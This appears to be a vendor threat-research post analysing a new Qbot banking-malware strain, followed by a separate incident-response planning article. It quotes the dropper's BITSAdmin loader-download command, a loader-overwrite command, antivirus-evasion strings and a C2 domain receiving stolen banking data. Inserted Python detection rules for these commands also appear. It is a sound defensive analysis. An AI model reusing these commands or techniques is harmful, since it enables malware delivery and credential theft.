
Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thousands of Victims

The Varonis Security Research team discovered a global cyber attack campaign leveraging a new strain of the Qbot banking malware. The campaign is actively targeting U.S. corporations but has hit networks worldwide—with victims throughout Europe, Asia, and South America—with a goal of stealing proprietary financial information, including bank account credentials.

During the analysis, we reversed this strain of Qbot and identified the attacker’s active command and control server, allowing us to determine the scale of the attack. Based on direct observation of the C2 server, thousands of victims around the globe are compromised and under active control by the attackers. Additional information uncovered from the C&C server exposed traces of the threat actors behind this campaign.

The attack was initially detected by Varonis DatAlert which alerted one of our North American customers of dropper activity, internal lateral movement, and suspicious network activity.

Our team has shared additional non-public information with the appropriate authorities and is performing responsible disclosure.

New Variant of Qbot Banking Malware

The threat actors used a new variant of Qbot, a well-known and sophisticated malware designed to steal banking credentials. Qbot employs anti-analysis techniques, frequently evades detection, and uses new infection vectors to stay ahead of defenders.

The malware is polymorphic, or constantly changing:

  • It creates files and folders with random names
  • Its dropper frequently changes C2 servers
  • The malware loader changes when there is an active internet connection (more on this later)

Qbot (or Qakbot) was first identified in 2009 and has evolved significantly. It is primarily designed for collecting browsing activity and data related to financial websites. Its worm-like capabilities allow it to spread across an organization’s network and infect other systems.

Discovery

Our forensics team began investigating after receiving a call from a customer, whose implementation of DatAlert had alerted them to unusual activity in their systems. Our team determined that at least one computer had been infected with malware and was attempting to propagate to additional systems on the network.

A sample was extracted and sent to our research team for analysis, who identified the malware as a variant of Qbot/Qakbot. The sample did not match any existing hashes, and further investigation revealed that this was a new strain.

Phase One – Dropper

File name: REQ_02132019b.doc.vbs

In previous versions of Qbot, the first launcher was a Word document macro. A zip file with a .doc.vbs extension was found during our investigation, indicating that the first infection was likely carried out via a phishing email that lured the victim into running the malicious VBS file.

Upon execution, the VBS extracts the OS version of the victim’s machine and attempts to detect common anti-virus software installed on the system.

AV strings the malware looks for include: Defender, Virus, Antivirus, Malw, Trend, Kaspersky, Kav, Mcafee, symantec

In this variant, the malware uses BITSAdmin to download the loader. This appears to be a new behavior, as previous samples used PowerShell.

BITSAdmin downloads the loader from one of the following URLs:

Downloading the loader using BITSAdmin from the VBS code:

intReturn = wShell.Run("bitsadmin /transfer qahdejob" & Second(Now) & " /Priority HIGH " & el & urlStr & " " & tempFile, 0, True)

Phase Two: Gain Persistency and Inject to explorer.exe

Filename: widgetcontrol.png

The loader, which executes the core malware, has multiple versions and is constantly updating even after execution. The version that the victim receives upon infection is dependent on the sp parameter that is hardcoded in the VBS file.

One interesting point is that each version of the loader is signed with a different digital certificate. Valid certificates usually indicate a file is trustworthy, while unsigned executables are suspicious.

Qbot is known to use fake or stolen (but valid) digital certificates to gain credibility and evade detection on the operating system.

We downloaded all the available versions of the loader (see IOCs below) and mapped the certificates.

Certificates used by the malware:

  • Saiitech Systems Limited
  • ECDJB Limited
  • Hitish Patel Consulting Ltd
  • Doorga Limited
  • INTENTEK LIMITED
  • Austek Consulting Limited
  • IO Pro Limited
  • Vercoe IT Ltd
  • Edsabame Consultants Ltd
  • SOVA CONSULTANCY LTD

Example of one of the certificates:

Persistence

When first run, the loader copies itself to %Appdata%\Roaming\{Randomized String} and then creates the following:

Injected Explorer.exe

The loader launches a 32-bit explorer.exe process and then injects the main payloads.

Here is the memory of explorer.exe with the injected payload as RWX memory segment:

After the injection, the loader overwrites its original executable with the 32-bit version of calc.exe:

"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > C:\Users\{TKTKTK}\Desktop\1.exe
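The two process chains described above (a script host spawning BITSAdmin with a /transfer download, and cmd.exe delaying with ping before copying calc.exe over the loader) are easy to express as detection rules over process-creation telemetry. The following is an added example, not code from the original post or from Varonis; the events, hostnames and paths are constructed for illustration.

```python
import re

# Constructed Sysmon Event ID 1 style process-creation events (not real telemetry).
# Event 0 mirrors the VBS-driven BITSAdmin download, event 1 the calc.exe overwrite,
# event 2 is routine administrative use of bitsadmin that must not alert.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer qahdejob17 /Priority HIGH "
                r"http://loader.example.invalid/widgetcontrol.png "
                r"C:\Users\u\AppData\Local\Temp\wc.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & '
                r'type "C:\Windows\System32\calc.exe" > C:\Users\u\Desktop\1.exe'},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /list /allusers"},
]

# Each rule is a predicate over one event; names are hypothetical rule identifiers.
RULES = {
    # Script host -> bitsadmin with a /transfer job fetching an http(s) URL.
    "script_host_bitsadmin_download": lambda e: (
        e["image"].lower().endswith("bitsadmin.exe")
        and e["parent"].lower().endswith(("wscript.exe", "cscript.exe"))
        and re.search(r"/transfer\s+\S+.*\bhttps?://", e["cmdline"], re.I) is not None
    ),
    # cmd.exe that pings localhost as a delay, then writes calc.exe over another file.
    "ping_delay_then_calc_overwrite": lambda e: (
        e["image"].lower().endswith("cmd.exe")
        and re.search(r"ping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1", e["cmdline"], re.I) is not None
        and re.search(r"\btype\s+\"?[^\"&>]*calc\.exe\"?\s*>", e["cmdline"], re.I) is not None
    ),
}


def detect(events):
    """Return (event index, rule name) pairs for every event that matches a rule."""
    hits = []
    for idx, event in enumerate(events):
        for name, predicate in RULES.items():
            if predicate(event):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Parent-process context is what keeps the first rule from firing on legitimate bitsadmin use, so feed it telemetry that records the parent image.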

Phase Three: Lateral Movement and Stealing Money

After establishing persistence, the main payloads begin to brute force accounts on the network.

If the malware compromises a domain account, it enumerates the “Domain Users” group and brute forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead.

Authentication attempts use NTLM via the WNetAddConnection API.

We extracted the usernames and passwords the malware uses when attempting to brute force local accounts (found here). The malware hides these dictionaries from static analysis, but they can be extracted during runtime.

X32dbg image of explorer.exe trying to connect to a remote computer with the username “Administrator” and the password “12345678”:
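Because the brute-force attempts are NTLM network logons, each target host records them as Security event 4625 (logon type 3, authentication package NTLM), and a single source trying many accounts in a short window stands out. The following detector is an added example, not code from the original post or from Varonis; the event records are constructed and the thresholds are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security 4625 (failed logon) records, not real telemetry:
# (timestamp, source IP, target account, logon type, authentication package).
FAILED_LOGONS = [
    ("2019-02-13T10:00:01", "10.0.0.25", "Administrator", 3, "NTLM"),
    ("2019-02-13T10:00:02", "10.0.0.25", "Administrator", 3, "NTLM"),
    ("2019-02-13T10:00:03", "10.0.0.25", "admin", 3, "NTLM"),
    ("2019-02-13T10:00:04", "10.0.0.25", "guest", 3, "NTLM"),
    ("2019-02-13T10:00:05", "10.0.0.25", "backup", 3, "NTLM"),
    ("2019-02-13T10:00:06", "10.0.0.25", "test", 3, "NTLM"),
    ("2019-02-13T10:05:00", "10.0.0.40", "jdoe", 2, "Kerberos"),  # an interactive typo
    ("2019-02-13T10:05:30", "10.0.0.40", "jdoe", 2, "Kerberos"),
]


def find_bruteforce_sources(events, window=timedelta(seconds=60),
                            min_attempts=5, min_users=3):
    """Return {source_ip: (attempts, distinct accounts)} for each source whose NTLM
    network-logon failures inside some sliding window reach both thresholds."""
    by_source = defaultdict(list)
    for ts, src, user, logon_type, package in events:
        if logon_type == 3 and package.upper() == "NTLM":
            by_source[src].append((datetime.fromisoformat(ts), user.lower()))

    flagged = {}
    for src, attempts in by_source.items():
        attempts.sort()
        lo = 0
        for hi in range(len(attempts)):
            # Slide the window start forward until it spans at most `window`.
            while attempts[hi][0] - attempts[lo][0] > window:
                lo += 1
            span = attempts[lo:hi + 1]
            users = {user for _, user in span}
            if len(span) >= min_attempts and len(users) >= min_users:
                if src not in flagged or len(span) > flagged[src][0]:
                    flagged[src] = (len(span), len(users))
    return flagged


if __name__ == "__main__":
    for src, (count, users) in find_bruteforce_sources(FAILED_LOGONS).items():
        print(f"{src}: {count} NTLM failures across {users} accounts")
```

Run it against 4625 events collected from file servers and domain controllers; a workstation that tries "Administrator" and a handful of generic local names against its peers is the pattern this campaign produces.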

Show Me the Money

The main goal of Qbot is to steal money from its victims; it uses several methods to send financial, credential and other information back to the attacker’s server:

  • Keylogging – Qbot captures every keystroke the victim enters and uploads them to the attacker.
  • Credentials/cookies – Qbot searches for saved credentials and cookies in browsers and sends them to the attacker.
  • Hooking – the main payload injects code into every process on the system that hooks API calls and watches for financial/banking strings; when it finds one, the malware extracts the data, credentials, or session cookies from that process and uploads them to the attacker.

The image shows that when authenticating to banking site buisnessline.huntington.com, the malware sends the POST data and the session cookies to the C2 server content.bigflimz.com:

Inside the Attacker’s C2 Server

On one of the attacker’s sites, we were able to find log files containing the victim IPs, operating system details, and anti-virus product names. The C2 server revealed past activities, as well as what appears to be additional malware versions (version table in the IOC section, below).

Some of the results may contain duplicates, but below are the top 10 countries, anti-virus products, and operating systems found. You can also find the full data set in our Github repository.

Victims by Country

We found 2,726 unique victim IP addresses. As many organizations use port address translation that masks internal IP addresses, the number of victims is likely much larger.

Victims by Anti-Virus Found

Victims by Operating System

IOCs

IOCs can be found on Github here.

Loader Versions

Full list found here.

How to Respond to a Cyber Security Incident

Every day another company is caught off guard by a data breach. While avoiding an attack is ideal, it’s not always possible. There’s no such thing as perfect security. Even if you’ve outsourced your IT or your data lives in the cloud, ultimately the responsibility for keeping your customer data safe falls on your shoulders.

In the unfortunate case that your company suffers a breach, you should be prepared to address it swiftly. To help, we created an easy-to-implement plan that outlines ways to proactively respond to and recover from a cyber security incident.

Avoid

Avoiding an attack is best whenever possible – but it’s just as important to have a cyber incident response plan in place in anticipation of an attack.

Take Inventory

What information is mission critical to your organization? Where does it live? How quickly can it be reinstated if it’s taken out in an attack?
Perform a complete audit of your systems, take note of the most important components, and track everything. Make sure you are not the only person aware of this document.

Pick a Team (or Two)

Now that you know what is most important, make sure all the relevant players are aware as well. Nominate one person as the IT owner in the event of a cyber attack. This individual needs to be readily available in case of an emergency, and equipped to manage the many internal technical components involved with recovering from a breach. Nominate a second person to own the external needs of a breach – such as reaching out to public relations, getting in touch with the organization's legal counsel, etc. Both of these roles are critical for a timely and effective response. Just to be safe – pick a second in command for both teams. After all, no man is an island.

Make a Plan

You know the data, you have the right people in place – now it’s time to develop an actionable plan and provide specific, concrete procedures to follow during a cyber incident. The procedures should address:

  • Who has lead responsibility?
  • How to contact critical personnel, and what data, networks, and services should be prioritized for recovery.
  • How to preserve data that was compromised by the intrusion and perform forensics to review for gaps in security and insights into the actual attack.
  • Who needs to be notified (data owners, customers, or partner companies) if their data or data affecting their networks is stolen.
  • When and what law enforcement will be brought into the picture, as well as any regulated reporting organizations.

Need a little more guidance? The California Department of Technology has a wonderful outline available online that is a great starting point!

Once developed, this plan should NOT live in a bubble. Make sure everyone on the team is aware of it and has read and reviewed it. In addition, take time to appraise the plan every quarter for relevancy and update it as necessary. Unfortunately, security is not static. Also, and this is important: the plan should be tested PRIOR to an actual cyber incident. Tornado, zombie apocalypse or biblical flooding is NOT the time for a try-out.

Address

Despite all your planning, preparation, and good intentions – what happens if (when) you are struck by a cyber attack? First things first – implement your cyber incident plan as soon as possible. Take a critical assessment of the situation. Does it appear to be a malicious attack or a simple tech glitch or misconfiguration? Once you’ve determined intent (and it’s not good), it’s time to collect and preserve the impacted data, and put the rest of your plan into action.

Who You Gonna Call?

Shhh…it’s not Ghostbusters! You should already have this information in place and readily available in your cyber incident plan. Start your outreach right away and begin with your response owners and work your way down the line. For example, the “external” owner at your organization should notify law enforcement, possible victims and the Department of Homeland Security, if necessary. Overall, the best approach is transparency. No one wants to admit to a breach. However, hiding critical information or delaying notification can backfire. A good approach involves being as direct as possible, highlighting the known and promising a timely follow up on any unknown. As always, keep it simple and straightforward. Don’t make promises you cannot keep or address concerns that are not valid.

You Might Need a Professional

Sometimes an internal response team just isn't enough. Fortunately, there are many third-party organizations that specialize in incident response and can help you navigate through the breach. A fresh set of eyes can look at the breach in a way internal staff – already vested in the company and outcome – cannot. They can help you discover exactly what has been accessed and compromised, identify what vulnerabilities caused the data breach, and remediate so the issue doesn't happen again.

Verify, then Reinstate

Finally, verify that your backup data was NOT compromised. It would be “no es bueno” to restore your system using data that you believe is valid, only to discover that your backup was just as bad as your compromised data.

Action

Even after a cyber incident appears to be under control, remain vigilant. Many intruders return and attempt to regain access to networks that they previously compromised. It’s possible that, despite your best efforts, a hacker could STILL find a way into your system. They are a slick, determined bunch.

Monitor & More

Continue to monitor your system for out of the ordinary activity. Invest in a software solution that utilizes User Behavior Analytics to recognize unusual behavior and notify prior to an actual attack. Varonis, for instance, will recognize and notify about both external and internal threats before irreparable damage can be done.

Just the Facts Ma’am

Once your organization has recovered from the attack, it’s time to thoroughly review what happened, and take steps to prevent similar attacks. What went well with the cyber incident response plan? What may need just a wee bit of tweaking? Assess the strengths and weaknesses of the plan, and determine what needs adjusting. Implement the changes. You’ll be glad you did if (when) you are attacked again.

React, Revise & Revisit

Protecting against a cyber incident is a full-time job. As ransomware evolves and the insider becomes a consistent threat, it’s important to continuously revise and revisit your Cyber Incident Response plan:

  • Keep your plan up to date.
  • Have the right technology in place (including lawful network monitoring) to address an incident.
  • Hire legal counsel that is familiar with the complex issues associated with cyber incidents.
  • Make sure existing corporate policies align with your incident response plan.

A cyber incident is never something you want to face. However, being proactive and prepared will make a huge difference in your response.